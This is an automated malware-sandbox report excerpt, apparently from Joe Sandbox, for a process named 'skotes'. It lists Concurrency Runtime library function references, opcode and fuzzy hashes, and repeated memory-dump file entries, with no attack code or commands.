                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                • String ID: pEvents
                                                                                                                                                                • API String ID: 2141394445-2498624650
                                                                                                                                                                • Opcode ID: b0f02195fdc8e3eead7a84d97cb4bf079c72af510f44c2c51211b5970da22420
                                                                                                                                                                • Instruction ID: c78270412d1b1cdb8f1353428975fcdb654427fb5301644440123b16ad4c7411
                                                                                                                                                                • Opcode Fuzzy Hash: b0f02195fdc8e3eead7a84d97cb4bf079c72af510f44c2c51211b5970da22420
                                                                                                                                                                • Instruction Fuzzy Hash: 9A814931D0021A9BCF25DFA8C981BBEB7F5EF15324F2444B9E411E7282DB74E945CA91
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00BB26E3
                                                                                                                                                                  • Part of subcall function 00BB24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00BB2504
                                                                                                                                                                • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00BB2704
                                                                                                                                                                • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00BB2711
                                                                                                                                                                • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00BB275F
                                                                                                                                                                • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00BB27E6
                                                                                                                                                                • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00BB27F9
                                                                                                                                                                • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00BB2846
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2530155754-0
                                                                                                                                                                • Opcode ID: 40e42fdf5f9fdc49bbf691a90ceda1776e6f698aa07535de468b5ddf1e9fef05
                                                                                                                                                                • Instruction ID: df17eecb2aceb5dcd46e47727cdbe9c3da19854ec56b68ccf3af90211714650e
                                                                                                                                                                • Opcode Fuzzy Hash: 40e42fdf5f9fdc49bbf691a90ceda1776e6f698aa07535de468b5ddf1e9fef05
                                                                                                                                                                • Instruction Fuzzy Hash: 44818C34904249ABDF169F54C991BFE7BF2EF56304F0400E8EC816B262CBB68D15DB62
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00BB2982
                                                                                                                                                                  • Part of subcall function 00BB24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00BB2504
                                                                                                                                                                • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00BB29A3
                                                                                                                                                                • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00BB29B0
                                                                                                                                                                • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00BB29FE
                                                                                                                                                                • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00BB2AA6
                                                                                                                                                                • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00BB2AD8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1256429809-0
                                                                                                                                                                • Opcode ID: 6afe8b522a8ca7e0552c452e1f10746722b9c51c778e15e2c67f6c9f7fe8fd72
                                                                                                                                                                • Instruction ID: 3289512180d25eb53fe36d85d580c9d3a05af906004e79e1db3228626e1d05a2
                                                                                                                                                                • Opcode Fuzzy Hash: 6afe8b522a8ca7e0552c452e1f10746722b9c51c778e15e2c67f6c9f7fe8fd72
                                                                                                                                                                • Instruction Fuzzy Hash: DF715830900249ABDF259F94C991AFEBBF6EF55304F0440D8EC416B262CBB69D16DB61
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00BA2876
                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00BA28DF
                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00BA2913
                                                                                                                                                                  • Part of subcall function 00BA07ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00BA080D
                                                                                                                                                                • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00BA2993
                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00BA29DB
                                                                                                                                                                  • Part of subcall function 00BA07C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00BA07DE
                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00BA29EF
                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00BA2A00
                                                                                                                                                                • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00BA2A4D
                                                                                                                                                                • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00BA2A7E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1321587334-0
                                                                                                                                                                • Opcode ID: 806d9f62c88b06f08a6b19fdf30d3e87420ab64248ceb4622ab9c7903c99d53c
                                                                                                                                                                • Instruction ID: c29cedfa1c672915a8dde69a7aa5398d1288e2c8e066d01cdd71ede5dd877c87
                                                                                                                                                                • Opcode Fuzzy Hash: 806d9f62c88b06f08a6b19fdf30d3e87420ab64248ceb4622ab9c7903c99d53c
                                                                                                                                                                • Instruction Fuzzy Hash: D081BF31A0865A9FCB28DFACD8D15AEB7F1FF4A304B6440ADE445EB250DB34AD45CB90
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00BA6A1F
                                                                                                                                                                • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00BA6A51
                                                                                                                                                                • List.LIBCONCRT ref: 00BA6A8C
                                                                                                                                                                • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00BA6A9D
                                                                                                                                                                • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00BA6AB9
                                                                                                                                                                • List.LIBCONCRT ref: 00BA6AF4
                                                                                                                                                                • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00BA6B05
                                                                                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00BA6B20
                                                                                                                                                                • List.LIBCONCRT ref: 00BA6B5B
                                                                                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00BA6B68
                                                                                                                                                                  • Part of subcall function 00BA5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00BA5EF7
                                                                                                                                                                  • Part of subcall function 00BA5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00BA5F09
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
